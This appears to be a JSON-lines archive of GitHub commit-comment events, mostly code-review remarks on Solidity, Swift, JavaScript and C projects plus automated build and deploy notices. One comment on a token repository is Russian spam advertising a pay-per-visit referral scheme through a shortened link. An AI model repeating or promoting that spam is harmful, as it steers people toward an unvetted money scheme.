{"id":"8017976004","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29832532,"position":64,"line":67,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-25T17:36:26Z","updated_at":"2018-07-25T17:36:26Z","author_association":"NONE","body":"Otherwise, where does it go?"}},"created_at":"2018-07-25T17:36:26Z"}
{"id":"8017976142","type":"CommitCommentEvent","actor":{"login":"Duke7467"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29832533,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T17:36:27Z","updated_at":"2018-07-25T17:36:27Z","author_association":"NONE","body":"Great project\n\n\n\n\n\n2018-07-25 20:09, Telix05 yazmış:\n> Great project\n> \n> --\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub [1], or mute the\n> thread [2].\n> \n> Links:\n> ------\n> [1]\n> https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29832129\n> [2]\n> https://github.com/notifications/unsubscribe-auth/Amq_CxJqaZtQgwsrqpBNhG5aeihBv5ioks5uKKY8gaJpZM4VaEAl\n"}},"created_at":"2018-07-25T17:36:27Z"}
{"id":"8017977596","type":"CommitCommentEvent","actor":{"login":"shailiej"},"repo":{"name":"marccampbell/help-center"},"payload":{"comment":{"id":29832535,"position":12,"line":12,"path":"content/docs/vendor-rbac/rule-order.md","commit_id":"54ece1d0a6046bb5bd806ed949e151b31b9e76a8","created_at":"2018-07-25T17:36:45Z","updated_at":"2018-07-25T17:36:45Z","author_association":"NONE","body":"(unless as `**/*` rule is specified in the `allowed` resources.   =>\r\n(unless `**/*` rule is specified in the `allowed` resources).\r\n\r\nNo 'as' and a closing bracket ')'    "}},"created_at":"2018-07-25T17:36:45Z"}
{"id":"8017981589","type":"CommitCommentEvent","actor":{"login":"Jusonex"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29832549,"position":null,"line":null,"path":null,"commit_id":"9796b3ecbfee879cade631a22f5268825abdc6b1","created_at":"2018-07-25T17:37:34Z","updated_at":"2018-07-25T17:37:34Z","author_association":"MEMBER","body":"You have to recreate the VS solution by invoking `win-create-projects.bat`. This downloads and extracts the latest CEF version."}},"created_at":"2018-07-25T17:37:34Z"}
{"id":"8017982072","type":"CommitCommentEvent","actor":{"login":"hoangtucochp"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29832551,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T17:37:39Z","updated_at":"2018-07-25T17:37:39Z","author_association":"NONE","body":"goodluck team\n\n2018-07-26 0:36 GMT+07:00 Duke7467 <notifications@github.com>:\n\n> Great project\n>\n>\n>\n>\n>\n> 2018-07-25 20:09, Telix05 yazmış:\n> > Great project\n> >\n> > --\n> > You are receiving this because you commented.\n> > Reply to this email directly, view it on GitHub [1], or mute the\n> > thread [2].\n> >\n> > Links:\n> > ------\n> > [1]\n> > https://github.com/iride2020/iRide-Token/commit/\n> 8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29832129\n> > [2]\n> > https://github.com/notifications/unsubscribe-auth/Amq_\n> CxJqaZtQgwsrqpBNhG5aeihBv5ioks5uKKY8gaJpZM4VaEAl\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29832533>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMNuGfUarYqmUm5jvptlUzdcuj6bLpNQks5uKKyfgaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-25T17:37:39Z"}
{"id":"8017983756","type":"CommitCommentEvent","actor":{"login":"jayands"},"repo":{"name":"themasch/node-ebml"},"payload":{"comment":{"id":29832556,"position":132,"line":67,"path":"lib/ebml/encoder.js","commit_id":"79477d27f0edb69d3ff480209a4eaa7c7b561fcf","created_at":"2018-07-25T17:38:01Z","updated_at":"2018-07-25T17:38:01Z","author_association":"NONE","body":"This is unnecessary; see the comment I left on the above line for why"}},"created_at":"2018-07-25T17:38:01Z"}
{"id":"8017983877","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29832558,"position":63,"line":66,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-25T17:38:03Z","updated_at":"2018-07-25T17:38:03Z","author_association":"NONE","body":"No longer expensive after you read them into separate variables."}},"created_at":"2018-07-25T17:38:03Z"}
{"id":"8017986354","type":"CommitCommentEvent","actor":{"login":"unibots"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29832565,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T17:38:31Z","updated_at":"2018-07-25T17:38:31Z","author_association":"NONE","body":"Кто хочет зарабатывать 3 $ в день?!\nБез вложений!\n1 visit= 0.04 $-0.45 $\nПросто следуйте этим шагам.\n1) переходите по ссылке: http://bit.ly/2vcBzY1\n2) нажмите: партнерам\n3) нажмите: зарегистрироваться.\n4) после этого копируйте реф. ссылку и начинайте рекламировать!\n"}},"created_at":"2018-07-25T17:38:31Z"}
{"id":"8017990979","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29832574,"position":111,"line":100,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-25T17:39:25Z","updated_at":"2018-07-25T17:39:25Z","author_association":"NONE","body":"Have you tried `return a == b;`??"}},"created_at":"2018-07-25T17:39:25Z"}
{"id":"8017992931","type":"CommitCommentEvent","actor":{"login":"mbj36"},"repo":{"name":"Microsoft/join-dev-design"},"payload":{"comment":{"id":29832581,"position":5,"line":68,"path":"docs/index.html","commit_id":"dd4b17d62ed6d54415465760b1da0a3fe32c0c20","created_at":"2018-07-25T17:39:48Z","updated_at":"2018-07-25T17:39:48Z","author_association":"NONE","body":"It will give 404 if clicked twice. It shouldn't be there "}},"created_at":"2018-07-25T17:39:48Z"}
{"id":"8017994441","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29832583,"position":102,"line":94,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-25T17:40:06Z","updated_at":"2018-07-25T17:40:06Z","author_association":"NONE","body":"You should put `game.commits[x].status` into 2 memory variables."}},"created_at":"2018-07-25T17:40:06Z"}
{"id":"8017994804","type":"CommitCommentEvent","actor":{"login":"patrikjuvonen"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29832586,"position":null,"line":null,"path":null,"commit_id":"9796b3ecbfee879cade631a22f5268825abdc6b1","created_at":"2018-07-25T17:40:11Z","updated_at":"2018-07-25T17:40:11Z","author_association":"COLLABORATOR","body":"Thanks, my bad. Works fine now!"}},"created_at":"2018-07-25T17:40:11Z"}
{"id":"8017996639","type":"CommitCommentEvent","actor":{"login":"rpdelaney"},"repo":{"name":"trussworks/truss-interview"},"payload":{"comment":{"id":29832589,"position":11,"line":40,"path":"README.md","commit_id":"a550c40a7f90371eebeea739b83b32832d2bddee","created_at":"2018-07-25T17:40:31Z","updated_at":"2018-07-25T17:40:31Z","author_association":"NONE","body":"`./normalizer < sample.csv > output.csv` would be more natural and eliminate an extraneous subprocess call and pipeline. Not a big deal with a small file like this but you will feel the difference with a big enough stream, so why not be consistent? :) "}},"created_at":"2018-07-25T17:40:31Z"}
{"id":"8017997624","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29832596,"position":null,"line":null,"path":null,"commit_id":"cd911ffbf9c144fa47a3f54a7bb75f9ef101a6d9","created_at":"2018-07-25T17:40:43Z","updated_at":"2018-07-25T17:40:43Z","author_association":"COLLABORATOR","body":"This commit is an example of why #927 needs to be looked into, as choosing whether or not to removed `assembler` will reduce duplication."}},"created_at":"2018-07-25T17:40:43Z"}
{"id":"8017997977","type":"CommitCommentEvent","actor":{"login":"eroux"},"repo":{"name":"BuddhistDigitalResourceCenter/public-digital-library"},"payload":{"comment":{"id":29832598,"position":null,"line":null,"path":null,"commit_id":"94e6232c458e6cd66573eb5dda41b8dc2f98fe92","created_at":"2018-07-25T17:40:47Z","updated_at":"2018-07-25T17:40:47Z","author_association":"NONE","body":"great!"}},"created_at":"2018-07-25T17:40:47Z"}
{"id":"8017998680","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29832602,"position":99,"line":91,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-25T17:40:54Z","updated_at":"2018-07-25T17:40:54Z","author_association":"NONE","body":"Perhaps a comment at the top of the file that explains `'D'` and `'V'`?"}},"created_at":"2018-07-25T17:40:54Z"}
{"id":"8017998729","type":"CommitCommentEvent","actor":{"login":"jwill2385"},"repo":{"name":"droid-squad/Natville"},"payload":{"comment":{"id":29832603,"position":null,"line":null,"path":null,"commit_id":"d91b15bde256152e804b34096a0807da299a943d","created_at":"2018-07-25T17:40:55Z","updated_at":"2018-07-25T17:40:55Z","author_association":"NONE","body":"When user presses on Distance button in recommendations fragment, All of the locations nearby reorganize by Longest to shortest distance. For The Rating button the locations reorganize by highest(5) to smallest rating.\r\n![screen shot 2018-07-25 at 10 38 42 am](https://user-images.githubusercontent.com/40250274/43217714-32371524-8ff7-11e8-8728-8eca2df9abd1.png)\r\n"}},"created_at":"2018-07-25T17:40:55Z"}
{"id":"8018001665","type":"CommitCommentEvent","actor":{"login":"davidbgk"},"repo":{"name":"betagouv/zam"},"payload":{"comment":{"id":29832616,"position":null,"line":null,"path":null,"commit_id":"dd545cced1759812c1b79dc21ecb81bc2650ce21","created_at":"2018-07-25T17:41:29Z","updated_at":"2018-07-25T17:41:29Z","author_association":"MEMBER","body":"😅 "}},"created_at":"2018-07-25T17:41:29Z"}
{"id":"8018002927","type":"CommitCommentEvent","actor":{"login":"rpdelaney"},"repo":{"name":"trussworks/truss-interview"},"payload":{"comment":{"id":29832618,"position":11,"line":40,"path":"README.md","commit_id":"a550c40a7f90371eebeea739b83b32832d2bddee","created_at":"2018-07-25T17:41:42Z","updated_at":"2018-07-25T17:41:42Z","author_association":"NONE","body":"Ah, looks like this was considered in the PR already. Not a big deal, carry on! "}},"created_at":"2018-07-25T17:41:42Z"}
{"id":"8018004903","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"mozilla/mentat"},"payload":{"comment":{"id":29832624,"position":null,"line":null,"path":null,"commit_id":"9a69b50898303e4c7cec8d8a1af885bd1b9dcd1a","created_at":"2018-07-25T17:42:05Z","updated_at":"2018-07-25T17:42:05Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\nsecrets:get:project/mentat/publish\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/mozilla/mentat:release\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:get:project/android-components/publish\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    \"secrets:get:project/mentat/publish\",\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/github-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/github-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/github-worker\",\n                \"queue:task-group-id:taskcluster-github/L5vo0kLjTzW2tBbucI8zcA\",\n                \"queue:schedule-task:taskcluster-github/L5vo0kLjTzW2tBbucI8zcA/L5vo0kLjTzW2tBbucI8zcA\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-25T17:42:05.758Z\n\n</details>"}},"created_at":"2018-07-25T17:42:05Z"}
{"id":"8018005028","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29832625,"position":61,"line":64,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-25T17:42:07Z","updated_at":"2018-07-25T17:42:07Z","author_association":"NONE","body":"Can a player overwrite his commit? For instance after the other player has placed his commit?"}},"created_at":"2018-07-25T17:42:07Z"}
{"id":"8018007446","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29832633,"position":111,"line":149,"path":"device/sensor/drv/drv_tvoc_sensirion_sgp30.c","commit_id":"2baa9063087dff9faab2d04ccaaa7676eddaf60c","created_at":"2018-07-25T17:42:35Z","updated_at":"2018-07-25T17:42:35Z","author_association":"NONE","body":"it might be wise to check for compatible products: explicit SGP30 check `product_id == 0`and feature set versions for both.\r\n\r\n```c\r\nint major = data[1] & 0xe0;\r\nint minor = data[1] & 0x1f;\r\n```\r\n\r\nThen for the SGP30 check for `major == 1` and for the SGPC3 `major == 0 && minor >= 6`"}},"created_at":"2018-07-25T17:42:35Z"}
{"id":"8018009830","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29832646,"position":61,"line":64,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-25T17:43:02Z","updated_at":"2018-07-25T17:43:02Z","author_association":"NONE","body":"Or even after the other player has revealed?\r\n"}},"created_at":"2018-07-25T17:43:02Z"}
{"id":"8018011056","type":"CommitCommentEvent","actor":{"login":"plainspace"},"repo":{"name":"Microsoft/join-dev-design"},"payload":{"comment":{"id":29832651,"position":5,"line":68,"path":"docs/index.html","commit_id":"dd4b17d62ed6d54415465760b1da0a3fe32c0c20","created_at":"2018-07-25T17:43:17Z","updated_at":"2018-07-25T17:43:17Z","author_association":"CONTRIBUTOR","body":"I see that! Are you saying it shouldn't be there or it shouldn't be in a paragraph?"}},"created_at":"2018-07-25T17:43:17Z"}
{"id":"8018016733","type":"CommitCommentEvent","actor":{"login":"rnewman"},"repo":{"name":"mozilla-mobile/firefox-ios"},"payload":{"comment":{"id":29832660,"position":13,"line":179,"path":"Storage/SQL/SQLiteHistoryRecommendations.swift","commit_id":"e613114ec6c625fa791811e4700d782e49951d10","created_at":"2018-07-25T17:44:22Z","updated_at":"2018-07-25T17:44:22Z","author_association":"CONTRIBUTOR","body":"Break out a constant!"}},"created_at":"2018-07-25T17:44:22Z"}
{"id":"8018019165","type":"CommitCommentEvent","actor":{"login":"mbj36"},"repo":{"name":"Microsoft/join-dev-design"},"payload":{"comment":{"id":29832661,"position":5,"line":68,"path":"docs/index.html","commit_id":"dd4b17d62ed6d54415465760b1da0a3fe32c0c20","created_at":"2018-07-25T17:44:49Z","updated_at":"2018-07-25T17:44:49Z","author_association":"NONE","body":"It should be only in main page."}},"created_at":"2018-07-25T17:44:49Z"}
{"id":"8018022814","type":"CommitCommentEvent","actor":{"login":"Fleker"},"repo":{"name":"actions-on-google/smart-home-dashboard"},"payload":{"comment":{"id":29832670,"position":null,"line":null,"path":null,"commit_id":"c7d84ebef38ca977b9f134ceea7c0279f8d04e9e","created_at":"2018-07-25T17:45:30Z","updated_at":"2018-07-25T17:45:30Z","author_association":"MEMBER","body":"Your error is the same as #2 "}},"created_at":"2018-07-25T17:45:30Z"}
{"id":"8018025146","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29832683,"position":null,"line":null,"path":null,"commit_id":"f63d44386173aa03343f8e6a0466d1d941825ba1","created_at":"2018-07-25T17:45:55Z","updated_at":"2018-07-25T17:45:55Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [allenfearp](https://allenfearp-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/sso-organizations](https://allenfearp-static-docs.pantheonsite.io/docs/sso-organizations)\n"}},"created_at":"2018-07-25T17:45:55Z"}
{"id":"8018026111","type":"CommitCommentEvent","actor":{"login":"rnewman"},"repo":{"name":"mozilla-mobile/firefox-ios"},"payload":{"comment":{"id":29832686,"position":11,"line":177,"path":"Storage/SQL/SQLiteHistoryRecommendations.swift","commit_id":"e613114ec6c625fa791811e4700d782e49951d10","created_at":"2018-07-25T17:46:07Z","updated_at":"2018-07-25T17:46:07Z","author_association":"CONTRIBUTOR","body":"No! @justindarc query history, not visits.\r\n\r\n100,000 visits ain't that much. My desktop Places has 250K places and 450K visits."}},"created_at":"2018-07-25T17:46:07Z"}
{"id":"8018028517","type":"CommitCommentEvent","actor":{"login":"rnewman"},"repo":{"name":"mozilla-mobile/firefox-ios"},"payload":{"comment":{"id":29832689,"position":13,"line":179,"path":"Storage/SQL/SQLiteHistoryRecommendations.swift","commit_id":"e613114ec6c625fa791811e4700d782e49951d10","created_at":"2018-07-25T17:46:34Z","updated_at":"2018-07-25T17:46:34Z","author_association":"CONTRIBUTOR","body":"You should also consider setting this to a much higher number until you have metrics. If you don't have metrics, you are not in a position to set this value."}},"created_at":"2018-07-25T17:46:34Z"}
{"id":"8018029064","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29832691,"position":null,"line":null,"path":null,"commit_id":"933ab9e320cbd780847045304b71b648509a8b11","created_at":"2018-07-25T17:46:39Z","updated_at":"2018-07-25T17:46:39Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [allenfearp](https://allenfearp-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/sso-organizations](https://allenfearp-static-docs.pantheonsite.io/docs/sso-organizations)\n"}},"created_at":"2018-07-25T17:46:39Z"}
{"id":"8018031305","type":"CommitCommentEvent","actor":{"login":"jamilnoyda"},"repo":{"name":"jamilnoyda/jamilnoyda.github.io"},"payload":{"comment":{"id":29832696,"position":null,"line":null,"path":null,"commit_id":"e3edae07f9a789ba0190f9a2189d79580ed6989c","created_at":"2018-07-25T17:47:06Z","updated_at":"2018-07-25T17:47:06Z","author_association":"OWNER","body":"![profile](https://user-images.githubusercontent.com/15954195/43218010-d18c84ec-9060-11e8-9e4f-04eee3b975fa.jpg)\r\n"}},"created_at":"2018-07-25T17:47:06Z"}
{"id":"8018031794","type":"CommitCommentEvent","actor":{"login":"rnewman"},"repo":{"name":"mozilla-mobile/firefox-ios"},"payload":{"comment":{"id":29832699,"position":31,"line":195,"path":"Storage/SQL/SQLiteHistoryRecommendations.swift","commit_id":"e613114ec6c625fa791811e4700d782e49951d10","created_at":"2018-07-25T17:47:11Z","updated_at":"2018-07-25T17:47:11Z","author_association":"CONTRIBUTOR","body":"Constant!\r\n\r\nAnd where did this number come from?! 50,000 visits ain't much."}},"created_at":"2018-07-25T17:47:11Z"}
{"id":"8018035575","type":"CommitCommentEvent","actor":{"login":"adrian-carro"},"repo":{"name":"AdelaHaoyuYe/spatial-housing-model"},"payload":{"comment":{"id":29832705,"position":4,"line":73,"path":"src/main/java/housing/HousingMarketRecord.java","commit_id":"060cca6e73fc65247adf1b67397fc6340b0019a9","created_at":"2018-07-25T17:47:55Z","updated_at":"2018-07-25T17:47:55Z","author_association":"NONE","body":"Since these comparators will only be used by RegionQualityRecord objects, why not to include them there instead of in the general HousingMarketRecord? Is there any reason I might be missing? Also, why not to have arg0, arg1 be already RegionQualityRecord objects, such that the conversion in lines 88, 102, 121, 135 are not needed?"}},"created_at":"2018-07-25T17:47:55Z"}
{"id":"8018036057","type":"CommitCommentEvent","actor":{"login":"LimaRumana"},"repo":{"name":"tanmoyie/Professional-Development"},"payload":{"comment":{"id":29832706,"position":null,"line":null,"path":null,"commit_id":"f259694df8e6ac8c4ffd1d18e09543743c836188","created_at":"2018-07-25T17:48:00Z","updated_at":"2018-07-25T17:48:00Z","author_association":"NONE","body":"https://www.linkedin.com/in/rumana-jahan-b32ab6153/\r\nhttps://novoresume.com/editor/resume/ee788440-9027-11e8-b4ef-e79bb0657cb3"}},"created_at":"2018-07-25T17:48:00Z"}
{"id":"8018042331","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29832723,"position":125,"line":112,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-25T17:49:15Z","updated_at":"2018-07-25T17:49:15Z","author_association":"NONE","body":"`else` what? Don't leave an implicit `else`."}},"created_at":"2018-07-25T17:49:15Z"}
{"id":"8018043496","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29832725,"position":125,"line":112,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-25T17:49:29Z","updated_at":"2018-07-25T17:49:29Z","author_association":"NONE","body":"You probably meant `require`."}},"created_at":"2018-07-25T17:49:29Z"}
{"id":"8018043703","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29832726,"position":null,"line":null,"path":null,"commit_id":"42d8b1b147cff3f626d0768cb44dc1a8be156873","created_at":"2018-07-25T17:49:32Z","updated_at":"2018-07-25T17:49:32Z","author_association":"NONE","body":"158270028_Issue#6422 (Myoldmopar) - x86_64-MacOS-10.9-clang: Tests Failed (1385 of 2946 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42d8b1b147cff3f626d0768cb44dc1a8be156873-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42d8b1b147cff3f626d0768cb44dc1a8be156873-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.01%25-red.png)</a> \n"}},"created_at":"2018-07-25T17:49:32Z"}
{"id":"8018046811","type":"CommitCommentEvent","actor":{"login":"adrian-carro"},"repo":{"name":"AdelaHaoyuYe/spatial-housing-model"},"payload":{"comment":{"id":29832729,"position":null,"line":null,"path":null,"commit_id":"060cca6e73fc65247adf1b67397fc6340b0019a9","created_at":"2018-07-25T17:50:07Z","updated_at":"2018-07-25T17:50:07Z","author_association":"NONE","body":"Once you've addressed my comments, could you open a pull request towards my alternative-commute branch? That way I'll be able to actually run your code, test it, and check the warnings you were referring to."}},"created_at":"2018-07-25T17:50:07Z"}
{"id":"8018048058","type":"CommitCommentEvent","actor":{"login":"ronnix"},"repo":{"name":"betagouv/zam"},"payload":{"comment":{"id":29832734,"position":null,"line":null,"path":null,"commit_id":"dd545cced1759812c1b79dc21ecb81bc2650ce21","created_at":"2018-07-25T17:50:21Z","updated_at":"2018-07-25T17:50:21Z","author_association":"COLLABORATOR","body":"Default value is false, I guess I just copied it from the development.ini file... 😬"}},"created_at":"2018-07-25T17:50:21Z"}
{"id":"8018051203","type":"CommitCommentEvent","actor":{"login":"jayands"},"repo":{"name":"themasch/node-ebml"},"payload":{"comment":{"id":29832739,"position":131,"line":66,"path":"lib/ebml/encoder.js","commit_id":"79477d27f0edb69d3ff480209a4eaa7c7b561fcf","created_at":"2018-07-25T17:50:55Z","updated_at":"2018-07-25T17:50:55Z","author_association":"NONE","body":"This can be rewritten as a for-of loop, or simplified down to what it really is: a filter looking for a specific string.\r\n\r\nVersion one:\r\n\r\n```js\r\nfor (const tagStr of tagStrs) { // yes, const is allowed here, surprisingly.\r\n                                // It destroys each one each iteration or something\r\n```\r\nVersion 2:\r\n\r\n```js\r\nconst tagStrs = Object.keys(this._schema)\r\n                      .filter(tagStr => tagStr.name === tagName); // only return the ones that match\r\nif(tagStrs.length > 0) {\r\n  return new Buffer(tagStr[0], 'hex'); // you're returning the first one that matches as-is,\r\n                                       // so I don't see a problem doing so here\r\n}\r\nreturn null;\r\n```"}},"created_at":"2018-07-25T17:50:55Z"}
{"id":"8018051382","type":"CommitCommentEvent","actor":{"login":"JoshClose"},"repo":{"name":"vforteli/Flexinets.Radius.RadiusServer"},"payload":{"comment":{"id":29832742,"position":null,"line":null,"path":null,"commit_id":"41775d8e0e8a56aff4fb8d228c0377678f41800c","created_at":"2018-07-25T17:50:57Z","updated_at":"2018-07-25T17:50:57Z","author_association":"NONE","body":"Cool. Is this something you can merge soon? I can build from source of need be, but would rather pull from nuget if possible."}},"created_at":"2018-07-25T17:50:57Z"}
{"id":"8018054445","type":"CommitCommentEvent","actor":{"login":"davidbgk"},"repo":{"name":"betagouv/zam"},"payload":{"comment":{"id":29832745,"position":null,"line":null,"path":null,"commit_id":"dd545cced1759812c1b79dc21ecb81bc2650ce21","created_at":"2018-07-25T17:51:33Z","updated_at":"2018-07-25T17:51:33Z","author_association":"MEMBER","body":"Maybe we can remove the line?"}},"created_at":"2018-07-25T17:51:33Z"}
{"id":"8018056759","type":"CommitCommentEvent","actor":{"login":"Marusyk"},"repo":{"name":"Marusyk/cake"},"payload":{"comment":{"id":29832750,"position":5,"line":42,"path":"src/Cake.Common/Tools/DotNetCore/Publish/DotNetCorePublishSettings.cs","commit_id":"a51aeeec22cd83e74036ecaafbfb0ba5a5617b03","created_at":"2018-07-25T17:51:59Z","updated_at":"2018-07-25T17:51:59Z","author_association":"OWNER","body":"Of course, thanks. What about:\r\nGets or sets a value indicating whether to do not build the project before publishing.\r\n"}},"created_at":"2018-07-25T17:51:59Z"}
{"id":"8018064826","type":"CommitCommentEvent","actor":{"login":"thaichessswinboard"},"repo":{"name":"ianfab/Makruk-Stockfish"},"payload":{"comment":{"id":29832776,"position":null,"line":null,"path":null,"commit_id":"72e094284146c2db8f14c511e2794099c3158305","created_at":"2018-07-25T17:53:32Z","updated_at":"2018-07-25T17:53:32Z","author_association":"NONE","body":"Now you source code good working but can you make makruk engine alway think THE END GAME KBQ BETTER THAN KNQ because KBQ can checkmate 44 moves better than KNQ can checkmate in 64 moves but only correct conner of Queen it will work. So if you engine can autoboard zigzag Bishop and give Knight to opponent to captures.  It will be good. like Example KNBQKN OR KNBQKR  now Bishop it have Values more than Knight or Bishop have values more than Rook or Knight + Queen have Values more than Rook Because opponent will offer Knights to captures Bishop of us and let the game have KNQK or offfer Rook to capture Bishop to make game to draw. so it mean they will have chance to Draw more than let you have KBQK so if Engine can think it self zigzag Bishop  or Zigzag Knight + Queen from Rook it will be make the game win more than draw. I hope you understand what I mean. I wait for your new source code of Endgame.cpp Many thanks to read my require.\r\n\r\nRegaurd\r\n\r\nPcst"}},"created_at":"2018-07-25T17:53:32Z"}
{"id":"8018065550","type":"CommitCommentEvent","actor":{"login":"Sjefkesuit"},"repo":{"name":"m-ke/cre-dashboard"},"payload":{"comment":{"id":29832778,"position":7,"line":54,"path":"src/routes/OperatingStatement.vue","commit_id":"d512a04b58d1a4f2fcff313a03759bf59ea29689","created_at":"2018-07-25T17:53:40Z","updated_at":"2018-07-25T17:53:40Z","author_association":"COLLABORATOR","body":"@m-ke yes indeed that was the plan: See item 3 in: https://github.com/m-ke/cre-dashboard/issues/8\r\nApparently this number can vary quite a bit and have up to 4 decimal points so buttons don't really make sense."}},"created_at":"2018-07-25T17:53:40Z"}
{"id":"8018066126","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29832779,"position":96,"line":137,"path":"contracts/RockPaperScissors.sol","commit_id":"34f737617e1a0b960ee931aefad396cf7a53d541","created_at":"2018-07-25T17:53:47Z","updated_at":"2018-07-25T17:53:47Z","author_association":"NONE","body":"How can an honest player make sure that they correctly hashed their choice before committing?"}},"created_at":"2018-07-25T17:53:47Z"}
